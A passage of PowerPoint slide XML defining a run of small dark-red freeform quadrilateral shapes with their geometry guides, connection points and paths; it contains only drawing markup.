                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 34"/>
                    <a:gd name="T16" fmla="*/ 0 h 50"/>
                    <a:gd name="T17" fmla="*/ 34 w 34"/>
                    <a:gd name="T18" fmla="*/ 50 h 50"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="34" h="50">
                      <a:moveTo>
                        <a:pt x="34" y="22"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="34" y="50"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="27"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="34" y="22"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10896" name="Freeform 302"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2575" y="3126"/>
                  <a:ext cx="30" cy="49"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 30 w 30"/>
                    <a:gd name="T1" fmla="*/ 24 h 49"/>
                    <a:gd name="T2" fmla="*/ 30 w 30"/>
                    <a:gd name="T3" fmla="*/ 49 h 49"/>
                    <a:gd name="T4" fmla="*/ 0 w 30"/>
                    <a:gd name="T5" fmla="*/ 27 h 49"/>
                    <a:gd name="T6" fmla="*/ 0 w 30"/>
                    <a:gd name="T7" fmla="*/ 0 h 49"/>
                    <a:gd name="T8" fmla="*/ 30 w 30"/>
                    <a:gd name="T9" fmla="*/ 24 h 49"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 30"/>
                    <a:gd name="T16" fmla="*/ 0 h 49"/>
                    <a:gd name="T17" fmla="*/ 30 w 30"/>
                    <a:gd name="T18" fmla="*/ 49 h 49"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="30" h="49">
                      <a:moveTo>
                        <a:pt x="30" y="24"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="30" y="49"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="27"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="30" y="24"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10897" name="Freeform 303"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2643" y="3176"/>
                  <a:ext cx="33" cy="54"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 33 w 33"/>
                    <a:gd name="T1" fmla="*/ 24 h 54"/>
                    <a:gd name="T2" fmla="*/ 33 w 33"/>
                    <a:gd name="T3" fmla="*/ 54 h 54"/>
                    <a:gd name="T4" fmla="*/ 0 w 33"/>
                    <a:gd name="T5" fmla="*/ 30 h 54"/>
                    <a:gd name="T6" fmla="*/ 0 w 33"/>
                    <a:gd name="T7" fmla="*/ 0 h 54"/>
                    <a:gd name="T8" fmla="*/ 33 w 33"/>
                    <a:gd name="T9" fmla="*/ 24 h 54"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 33"/>
                    <a:gd name="T16" fmla="*/ 0 h 54"/>
                    <a:gd name="T17" fmla="*/ 33 w 33"/>
                    <a:gd name="T18" fmla="*/ 54 h 54"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="33" h="54">
                      <a:moveTo>
                        <a:pt x="33" y="24"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="33" y="54"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="30"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="33" y="24"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10898" name="Freeform 304"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2607" y="3150"/>
                  <a:ext cx="34" cy="53"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 34 w 34"/>
                    <a:gd name="T1" fmla="*/ 25 h 53"/>
                    <a:gd name="T2" fmla="*/ 34 w 34"/>
                    <a:gd name="T3" fmla="*/ 53 h 53"/>
                    <a:gd name="T4" fmla="*/ 0 w 34"/>
                    <a:gd name="T5" fmla="*/ 28 h 53"/>
                    <a:gd name="T6" fmla="*/ 0 w 34"/>
                    <a:gd name="T7" fmla="*/ 0 h 53"/>
                    <a:gd name="T8" fmla="*/ 34 w 34"/>
                    <a:gd name="T9" fmla="*/ 25 h 53"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 34"/>
                    <a:gd name="T16" fmla="*/ 0 h 53"/>
                    <a:gd name="T17" fmla="*/ 34 w 34"/>
                    <a:gd name="T18" fmla="*/ 53 h 53"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="34" h="53">
                      <a:moveTo>
                        <a:pt x="34" y="25"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="34" y="53"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="28"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="34" y="25"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10899" name="Freeform 305"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2575" y="3191"/>
                  <a:ext cx="29" cy="50"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 29 w 29"/>
                    <a:gd name="T1" fmla="*/ 23 h 50"/>
                    <a:gd name="T2" fmla="*/ 29 w 29"/>
                    <a:gd name="T3" fmla="*/ 50 h 50"/>
                    <a:gd name="T4" fmla="*/ 0 w 29"/>
                    <a:gd name="T5" fmla="*/ 26 h 50"/>
                    <a:gd name="T6" fmla="*/ 0 w 29"/>
                    <a:gd name="T7" fmla="*/ 0 h 50"/>
                    <a:gd name="T8" fmla="*/ 29 w 29"/>
                    <a:gd name="T9" fmla="*/ 23 h 50"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 29"/>
                    <a:gd name="T16" fmla="*/ 0 h 50"/>
                    <a:gd name="T17" fmla="*/ 29 w 29"/>
                    <a:gd name="T18" fmla="*/ 50 h 50"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="29" h="50">
                      <a:moveTo>
                        <a:pt x="29" y="23"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="29" y="50"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="29" y="23"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10900" name="Freeform 306"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2676" y="3271"/>
                  <a:ext cx="40" cy="63"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 40 w 40"/>
                    <a:gd name="T1" fmla="*/ 33 h 63"/>
                    <a:gd name="T2" fmla="*/ 40 w 40"/>
                    <a:gd name="T3" fmla="*/ 63 h 63"/>
                    <a:gd name="T4" fmla="*/ 0 w 40"/>
                    <a:gd name="T5" fmla="*/ 32 h 63"/>
                    <a:gd name="T6" fmla="*/ 0 w 40"/>
                    <a:gd name="T7" fmla="*/ 0 h 63"/>
                    <a:gd name="T8" fmla="*/ 40 w 40"/>
                    <a:gd name="T9" fmla="*/ 33 h 63"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 40"/>
                    <a:gd name="T16" fmla="*/ 0 h 63"/>
                    <a:gd name="T17" fmla="*/ 40 w 40"/>
                    <a:gd name="T18" fmla="*/ 63 h 63"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="40" h="63">
                      <a:moveTo>
                        <a:pt x="40" y="33"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="40" y="63"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="32"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="40" y="33"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="400000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10901" name="Freeform 307"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2642" y="3244"/>
                  <a:ext cx="32" cy="58"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 32 w 32"/>
                    <a:gd name="T1" fmla="*/ 26 h 58"/>
                    <a:gd name="T2" fmla="*/ 32 w 32"/>
                    <a:gd name="T3" fmla="*/ 58 h 58"/>
                    <a:gd name="T4" fmla="*/ 0 w 32"/>
                    <a:gd name="T5" fmla="*/ 29 h 58"/>
                    <a:gd name="T6" fmla="*/ 0 w 32"/>
                    <a:gd name="T7" fmla="*/ 0 h 58"/>
                    <a:gd name="T8" fmla="*/ 32 w 32"/>
                    <a:gd name="T9" fmla="*/ 26 h 58"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 32"/>
                    <a:gd name="T16" fmla="*/ 0 h 58"/>
                    <a:gd name="T17" fmla="*/ 32 w 32"/>
                    <a:gd name="T18" fmla="*/ 58 h 58"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="32" h="58">
                      <a:moveTo>
                        <a:pt x="32" y="26"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="32" y="58"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="29"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="32" y="26"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10902" name="Freeform 308"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2606" y="3215"/>
                  <a:ext cx="34" cy="56"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 34 w 34"/>
                    <a:gd name="T1" fmla="*/ 28 h 56"/>
                    <a:gd name="T2" fmla="*/ 34 w 34"/>
                    <a:gd name="T3" fmla="*/ 56 h 56"/>
                    <a:gd name="T4" fmla="*/ 0 w 34"/>
                    <a:gd name="T5" fmla="*/ 29 h 56"/>
                    <a:gd name="T6" fmla="*/ 0 w 34"/>
                    <a:gd name="T7" fmla="*/ 0 h 56"/>
                    <a:gd name="T8" fmla="*/ 34 w 34"/>
                    <a:gd name="T9" fmla="*/ 28 h 56"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 34"/>
                    <a:gd name="T16" fmla="*/ 0 h 56"/>
                    <a:gd name="T17" fmla="*/ 34 w 34"/>
                    <a:gd name="T18" fmla="*/ 56 h 56"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="34" h="56">
                      <a:moveTo>
                        <a:pt x="34" y="28"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="34" y="56"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="29"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="34" y="28"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="600000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10903" name="Freeform 309"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2575" y="3255"/>
                  <a:ext cx="29" cy="51"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 29 w 29"/>
                    <a:gd name="T1" fmla="*/ 24 h 51"/>
                    <a:gd name="T2" fmla="*/ 29 w 29"/>
                    <a:gd name="T3" fmla="*/ 51 h 51"/>
                    <a:gd name="T4" fmla="*/ 0 w 29"/>
                    <a:gd name="T5" fmla="*/ 25 h 51"/>
                    <a:gd name="T6" fmla="*/ 0 w 29"/>
                    <a:gd name="T7" fmla="*/ 0 h 51"/>
                    <a:gd name="T8" fmla="*/ 29 w 29"/>
                    <a:gd name="T9" fmla="*/ 24 h 51"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 29"/>
                    <a:gd name="T16" fmla="*/ 0 h 51"/>
                    <a:gd name="T17" fmla="*/ 29 w 29"/>
                    <a:gd name="T18" fmla="*/ 51 h 51"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="29" h="51">
                      <a:moveTo>
                        <a:pt x="29" y="24"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="29" y="51"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="25"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="29" y="24"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10904" name="Freeform 310"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2676" y="3344"/>
                  <a:ext cx="40" cy="64"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 40 w 40"/>
                    <a:gd name="T1" fmla="*/ 35 h 64"/>
                    <a:gd name="T2" fmla="*/ 40 w 40"/>
                    <a:gd name="T3" fmla="*/ 64 h 64"/>
                    <a:gd name="T4" fmla="*/ 0 w 40"/>
                    <a:gd name="T5" fmla="*/ 30 h 64"/>
                    <a:gd name="T6" fmla="*/ 0 w 40"/>
                    <a:gd name="T7" fmla="*/ 0 h 64"/>
                    <a:gd name="T8" fmla="*/ 40 w 40"/>
                    <a:gd name="T9" fmla="*/ 35 h 64"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 40"/>
                    <a:gd name="T16" fmla="*/ 0 h 64"/>
                    <a:gd name="T17" fmla="*/ 40 w 40"/>
                    <a:gd name="T18" fmla="*/ 64 h 64"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="40" h="64">
                      <a:moveTo>
                        <a:pt x="40" y="35"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="40" y="64"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="30"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="40" y="35"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10905" name="Freeform 311"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2642" y="3313"/>
                  <a:ext cx="32" cy="60"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
